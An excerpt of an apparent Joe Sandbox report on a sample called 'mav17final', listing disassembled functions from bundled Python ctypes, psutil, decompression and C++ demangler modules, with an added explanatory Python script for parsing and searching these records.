                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ReadyType_$Module_Type
                                                  • String ID:
                                                  • API String ID: 2298540608-0
                                                  • Opcode ID: 54f91af859aac5329c47ad103bf883f4ecd078e41e036d01a27fff442e20b039
                                                  • Instruction ID: fe649812218aa10936684200a38d4b6c9779117c7ac2106554818e3fe422b455
                                                  • Opcode Fuzzy Hash: 54f91af859aac5329c47ad103bf883f4ecd078e41e036d01a27fff442e20b039
                                                  • Instruction Fuzzy Hash: 9B718A20A19F9392FA419F29FC841252BA5BF45BEAF444039DA4D97774EF3CE10AC314
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseErrorHandleLastQueryStatus
                                                  • String ID: (sk)$QueryServiceStatusEx$unknown
                                                  • API String ID: 2049475656-71987940
                                                  • Opcode ID: 260939895f8968e7d6e986ed7e336b89b0b1d1d1002d1a47cba4b384be158184
                                                  • Instruction ID: c2fd47fa5896c92908f7ba6b6075edb162a096955617bf961a50312c397f9956
                                                  • Opcode Fuzzy Hash: 260939895f8968e7d6e986ed7e336b89b0b1d1d1002d1a47cba4b384be158184
                                                  • Instruction Fuzzy Hash: A7510D21A1DAC682EE14DF6AE8541796BA1FFA9BE4F444035DB4E43B64EF3CE4078700
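Every function record in this part of the report has the same fixed shape: an APIs block (resolved calls with the call-site address), an optional Strings block, the Memory Dump Source the function was lifted from, the IDA-plugin snapshot, and the Similarity fields (API ID, String ID, opcode and instruction hashes). That regularity makes a plain-text export easy to machine-read, which is useful when triaging which dumped module calls which Windows API. The following is an added example and not part of the Joe Sandbox report or its tooling: it parses records of this shape, strips the "Download File" link text the HTML export leaves on the Associated lines, groups functions by the image base they were dumped from, and searches resolved API names and the API/String ID fields for a keyword. The sample input is two records copied from this page. The decoding of the .sdmp file-name fields (dump address, protection, type, module index) is an inference from the values seen here, where the protection field matches the Win32 PAGE_* constants and 01000000 matches MEM_IMAGE; treat it as an assumption, not documented format.

```python
import re
from collections import defaultdict

# Constructed sample: two records copied from the report above, with the
# 'Download File' link text the HTML export leaves on Associated lines.
SAMPLE = """\
APIs
• PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6504E
• PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651A7
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
Similarity
• API ID: ReadyType_$Module_Type
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
Similarity
• API ID: Service$CloseErrorHandleLastQueryStatus
• String ID: (sk)$QueryServiceStatusEx$unknown
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"
# name.MODULE(args), ref: <call-site address>; '?' marks an argument the sandbox could not resolve
API_RE = re.compile(r"^(?P<name>[^.(]+)\.(?P<module>[^(]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# Assumed .sdmp layout: two run identifiers (not decoded), dump id, dump
# address, protection, state, type, module index. The protection values seen
# in this report (0x20 code, 0x02 headers, 0x04 data) match the Win32 PAGE_* constants.
SDMP_RE = re.compile(r"^[0-9A-F]{8}\.[0-9A-F]{8}\.(?P<dump>\d+)\.(?P<addr>[0-9A-F]{16})\."
                     r"(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<type>[0-9A-F]{8})\.(?P<module>[0-9A-F]{8})\.sdmp$")
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

def parse_api_line(body):
    m = API_RE.match(body)
    if not m:
        return {"raw": body}
    return {"name": m["name"], "module": m["module"], "args": m["args"].split(","), "ref": int(m["ref"], 16)}

def parse_sdmp_name(name):
    m = SDMP_RE.match(name)
    if not m:
        return {"file": name}
    prot = int(m["protect"], 16)
    return {"file": name, "dump_id": int(m["dump"]), "address": int(m["addr"], 16),
            "protect": PAGE_PROTECT.get(prot, hex(prot)), "mem_image": m["type"] == "01000000",
            "module_index": int(m["module"], 16)}

def parse_source_line(value):
    """'<sdmp name>, Offset: <image base>, based on PE: true|false'"""
    name, _, rest = value.partition(", ")
    info = parse_sdmp_name(name)
    for key, _, val in (item.partition(": ") for item in rest.split(", ")):
        if key == "Offset":
            info["image_base"] = int(val, 16)
        elif key == "based on PE":
            info["based_on_pe"] = val == "true"
    return info

def parse_records(text):
    """One record per 'APIs' header; text before the first header (a record
    cut off at the top of an excerpt) is ignored."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "source": None, "associated": [], "fields": {}}
            records.append(cur)
        if line in SECTION_HEADERS:
            section = line
            continue
        if cur is None or not line.startswith("• "):
            continue
        body = line[2:].strip()
        if body.endswith(LINK_RESIDUE):  # strip the HTML export's link text
            body = body[:-len(LINK_RESIDUE)].rstrip()
        if section == "APIs":
            cur["apis"].append(parse_api_line(body))
            continue
        key, _, value = (s.strip() for s in body.partition(":"))
        if key == "Source File":
            cur["source"] = parse_source_line(value)
        elif key == "Associated":
            cur["associated"].append(parse_sdmp_name(value))
        else:
            cur["fields"][key] = value
    return records

def group_by_module(records):
    """Functions keyed by the image base of the module they were dumped from."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["source"]["image_base"] if rec["source"] else None].append(rec)
    return dict(groups)

def search(records, needle):
    """Records whose resolved API names, API ID or String ID mention needle (case-insensitive)."""
    needle = needle.lower()
    return [rec for rec in records
            if any(needle in h.lower() for h in
                   [a.get("name", a.get("raw", "")) for a in rec["apis"]]
                   + [rec["fields"].get("API ID", ""), rec["fields"].get("String ID", "")])]
```

Run `parse_records` over the saved text of the report and `group_by_module` gives one bucket per dumped module (here 0x7FF8B9F60000 and 0x7FF8B9070000); `search(records, "QueryServiceStatusEx")` then returns the service-status function even though its APIs block is empty, because the name survives in the String ID field. The String ID and API ID fields are the sandbox's own fuzzy summaries, so searching them is a triage aid, not proof that the call is reachable.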
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+$Replicator::operator[]
                                                  • String ID: `anonymous namespace'
                                                  • API String ID: 3863519203-3062148218
                                                  • Opcode ID: 29843075ff213e4678463bd9e4c4852a4219599ce3764149382065ef125c3596
                                                  • Instruction ID: 550f045ffe893532339e6bb5e80a155102005404d716f2cba08a5bbfb20e766d
                                                  • Opcode Fuzzy Hash: 29843075ff213e4678463bd9e4c4852a4219599ce3764149382065ef125c3596
                                                  • Instruction Fuzzy Hash: C6E13672A08B8299EB10DF2DE5801AD7BA0FB44B84F4441B6EF9D17B59DF38E554E700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$String$LongLong_Occurred$Bytes_Capsule_CharClearFreeMem_Unicode_UnsignedWide
                                                  • String ID: Don't know how to convert parameter %d$_ctypes pymem$int too long to convert
                                                  • API String ID: 3969321993-4137960972
                                                  • Opcode ID: 84a72b6a64f7e58ef7106ff91161727bef33725574b0370cedf856625ec34b12
                                                  • Instruction ID: 916fe931dedc0605be5d2df4c48712a079f3173fb19173bd10d45e4bfcd36065
                                                  • Opcode Fuzzy Hash: 84a72b6a64f7e58ef7106ff91161727bef33725574b0370cedf856625ec34b12
                                                  • Instruction Fuzzy Hash: 6451F632A19F8282EB448F29E89417827A0FF49BFAB185535DB5D837A8DF3CE551C350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocDict_$CallErr_ErrorFromFunction_ItemLong_Object_OccurredPackSizeSsize_tTuple_With
                                                  • String ID: %.200s_Array_%Id$Array length must be >= 0, not %zd$Expected a type object$_length_$_type_$s(O){s:n,s:O}
                                                  • API String ID: 2975079148-1488966637
                                                  • Opcode ID: 4b9e39d2e5c219fd7f77c84992df2d80c2fda8daf9d237960527683bdad92fae
                                                  • Instruction ID: 7eca9d6ff16c404f4d081a044a86e2c792e015458648155b138954e77fcd8c26
                                                  • Opcode Fuzzy Hash: 4b9e39d2e5c219fd7f77c84992df2d80c2fda8daf9d237960527683bdad92fae
                                                  • Instruction Fuzzy Hash: 20512821A09FC285EE508F59E9502B977A4EF4ABF6F18A535DB0E463A4EF3CE445C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$String$Arg_AuditBuffer_ContiguousDeallocFormatFromMemoryObjectParseSizeSys_Tuple_View_
                                                  • String ID: Buffer size too small (%zd instead of at least %zd bytes)$O|n:from_buffer$abstract class$ctypes.cdata/buffer$nnn$offset cannot be negative$underlying buffer is not C contiguous$underlying buffer is not writable
                                                  • API String ID: 3947696715-3790261066
                                                  • Opcode ID: 6f91a64f5329831d1cdf7c4b25470fb5dbaa7ad2f9e3551f3ba25eea1f825ae0
                                                  • Instruction ID: b70d24247ee1fc7790b8c7ada05db2768837d910fc19dd9b6b5ac387476d495b
                                                  • Opcode Fuzzy Hash: 6f91a64f5329831d1cdf7c4b25470fb5dbaa7ad2f9e3551f3ba25eea1f825ae0
                                                  • Instruction Fuzzy Hash: 92412861A08BC681EA54CF2EE8901B927A1EF85BF6F086135DB1D477A5DF6CE588C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Capsule_$Dict_Err_ItemMem_String$CallocDeallocDictErrorFreeFromInternOccurredPointerState_ThreadUnicode_ValidWith
                                                  • String ID: _ctypes pymem$cannot get thread state$ctypes.error_object$ctypes.error_object is an invalid capsule
                                                  • API String ID: 2323834031-3474121714
                                                  • Opcode ID: accf9b440147d9a92cb32684a6abaa720b59604840fdd08eebf715022aa40aa7
                                                  • Instruction ID: 318735d007ae14006ff4bfc844666fbbe453ce6c54eeee8b5209da6a2c00b523
                                                  • Opcode Fuzzy Hash: accf9b440147d9a92cb32684a6abaa720b59604840fdd08eebf715022aa40aa7
                                                  • Instruction Fuzzy Hash: 8731F320A0AF8381EA948F19EC541782BA0AF49BFBF596435DB0E437A4EF3DE545D310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorInformationLastLogicalProcessor
                                                  • String ID: GetLogicalProcessorInformationEx() count was 0$GetLogicalProcessorInformationEx() returned %u$Win < 7; cpu_count_cores() forced to None$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 836211139-299206587
                                                  • Opcode ID: 4fbf2db0554dc03b03eaadc2732e5f3e02d61a734d2f394582dadc023be77089
                                                  • Instruction ID: 6b557b8ba70c32673dc5ee83be201f533888bc2b927862b0e8c869addf0e3f1d
                                                  • Opcode Fuzzy Hash: 4fbf2db0554dc03b03eaadc2732e5f3e02d61a734d2f394582dadc023be77089
                                                  • Instruction Fuzzy Hash: 3E512D21A096C682EF549F2DE8542B97BA1BF64BE1F44813ADB0E07795DF3CE846C350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Err_$Format$AttrLookupObject_OccurredSequence_StringTupleTuple_
                                                  • String ID: _argtypes_ has too many arguments (%zi), maximum is %i$_argtypes_ must be a sequence of types$item %zd in _argtypes_ has no from_param method
                                                  • API String ID: 4102822968-1150265712
                                                  • Opcode ID: b465a1dad8b079f441bebe69d373bb45d8456e0132b52fc939e0217758a31e23
                                                  • Instruction ID: c1274b7ff749d5705b478a1423be304c4a0ebb626bc5c78f3abdff2c1223e475
                                                  • Opcode Fuzzy Hash: b465a1dad8b079f441bebe69d373bb45d8456e0132b52fc939e0217758a31e23
                                                  • Instruction Fuzzy Hash: 8E410622E0DF8392EA559F29E8440786BA0AF96FF6F082035CB0E46B64DE3CE545C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: From$FormatUnicode_$DeallocDoubleFloat_
                                                  • String ID: <cparam '%c' (%R)>$<cparam '%c' (%d)>$<cparam '%c' (%ld)>$<cparam '%c' (%lld)>$<cparam '%c' (%p)>$<cparam '%c' ('%c')>$<cparam '%c' ('\x%02x')>$<cparam '%c' at %p>$<cparam 0x%02x at %p>
                                                  • API String ID: 1798191970-1075073485
                                                  • Opcode ID: e630b7be73e712d3a37526d796ee4f4f39b16323d62473f23fa0d0fb00351437
                                                  • Instruction ID: f0b69bd779605589c1fdd6e2248dfe66ff526c7cfa630213eeadf11bbacfaa17
                                                  • Opcode Fuzzy Hash: e630b7be73e712d3a37526d796ee4f4f39b16323d62473f23fa0d0fb00351437
                                                  • Instruction Fuzzy Hash: 0C415162E0C6C782E7694F2DEC550381B61DF56BE6F281138C74E067A9DE2CF945E360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Buffer_ReleaseString$Arg_AuditFormatParseSizeSys_Tuple_memcpy
                                                  • String ID: Buffer size too small (%zd instead of at least %zd bytes)$abstract class$ctypes.cdata/buffer$nnn$offset cannot be negative$y*|n:from_buffer_copy
                                                  • API String ID: 2374319793-1742308441
                                                  • Opcode ID: 2d8fddc9779f14f0481d8ddfd406fb15762d92becc72ec0614fe25a827832394
                                                  • Instruction ID: 484033608bd456210c6263b488e247d9cffbd635328812e6c8518aa24279f96b
                                                  • Opcode Fuzzy Hash: 2d8fddc9779f14f0481d8ddfd406fb15762d92becc72ec0614fe25a827832394
                                                  • Instruction Fuzzy Hash: 48312861B18FC681EA508F5AE8402B96760FF85BE2F449036DB4E83765DE3CE449C300
                                                  APIs
                                                  Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: AttrObject_String$Arg_Dealloc$KeywordsParseSequence_SizeSliceTuple_
• String ID: OOO:COMError$args$details$hresult$text
• API String ID: 4238450639-2065934886
• Opcode ID: 7b88bc987767ef29d30f6af4a34bd6ec754f27a2cd5e2595f319dc9faf46bccc
• Instruction ID: 189058dab90437c012c784b4198e491f918953bd82f6ef352d38aaf2643a0bcd
• Instruction Fuzzy Hash: B0312B61A08F8292FA109F6DE9411BA2BA0FF85BF6F486035CF4E47764DE2CE445C740
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Err_Eval_FromThread$Arg_AuditCharErrorFormatFreeLastLibraryLoadLong_Mem_ParseRestoreSaveStringSys_TupleUnicode_VoidWideWindows
• String ID: Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax.$U|i:LoadLibrary$ctypes.dlopen
• API String ID: 3805577924-808210370
• Opcode ID: 8085d2a71d9d3a5a76fe34bec048b7c14a2e952a150ea8cd1b327b92dda5160e
• Instruction ID: dafb12246e43aaa9766233cc62f924e57ea7374061a6b4f65100cbc9e198af33
• Instruction Fuzzy Hash: F5210A61E08FC386FA449FAAE8541796B61AF8ABF6F085035CB4E42364DF7CE449C710
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Err_$Dealloc$StringUnraisableWrite$AttrClearFromImportImport_InternLongLong_ModuleObject_OccurredUnicode_
• String ID: DllCanUnloadNow$_ctypes.DllCanUnloadNow$ctypes
• API String ID: 3419117993-4136862661
• Opcode ID: 6480632f02bad077a56764e5c1bb2d947567b6f8de28b8c217792b4108e53cfe
• Instruction ID: 0844d4d1c954aa4b371dc91bccbc7b8ad0571e95d7abc54a628be9d3bd3bf97a
• Instruction Fuzzy Hash: 0821BB21E09F8691FE549F29ED582342BA1AF5ABF7F086134CB4E46760EF2CA455C305
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
Similarity
• API ID: NameName::$Name::operator+atolswprintf_s
• String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
• API String ID: 2331677841-2441609178
• Opcode ID: 9797e925e62f8d7d60f646e305733279f9163504f8593401decf67f28b7cb35e
• Instruction ID: 125e2c7957815543d749d593b41b8f5bc2236b0b97d07459b6cc188b05d6a526
• Instruction Fuzzy Hash: BCF18A32E1C65384FB18AB7C8AA41BC27A1BF44FC4F4500B6CF4E66A95DE3DA945E340
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
• Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
Similarity
• API ID: Mem_$DeallocErr_Free$AttrFormatMallocMemoryObject_StringUnicode_
• String ID: %s:%s:$bit fields not allowed for type %s$number of bits invalid for bit field
• API String ID: 2455365098-3576608231
• Opcode ID: 2c8a630497d9b26071984d54006c75933da3e15f2b28fdb68437a92c613d873a
• Instruction ID: 63c7349a73bc2f0fe5b99d42c03ebf4576343760101e0bdc30dafa967d0d5032
• Instruction Fuzzy Hash: 0A812932A09B8286EB50CF69E5442A927A5FB45BEAF441236DB1D577A4DF3CE445C300
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
• Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
Similarity
• API ID: Buffer_$Arg_BufferContiguousIndexKeywordsLong_Number_Object_ReleaseSsize_tUnpackmemset
• String ID: argument 'data'$contiguous buffer$decompress
• API String ID: 2593461735-2667845042
• Opcode ID: 3b05843de0e9ce16ff05c83b1e5ddb82a75458333f409d7b11fcb9ec86cb24ae
• Instruction ID: 997f3afed5144c54abfe46c98bd4cfb855a5baa500e1eec575bc5dbfa6e0d290
• Instruction Fuzzy Hash: 90412A61A1CB8292EE249F1AE4446B963B5FB49BD4F444231DF5D07B94EF3CE58AC700
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
• Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
Similarity
• API ID: Service$CloseConfigErrorHandleLastQuery
• String ID: (OOOs)$QueryServiceConfigW$automatic$disabled$manual$unknown
• API String ID: 3136074459-3989453403
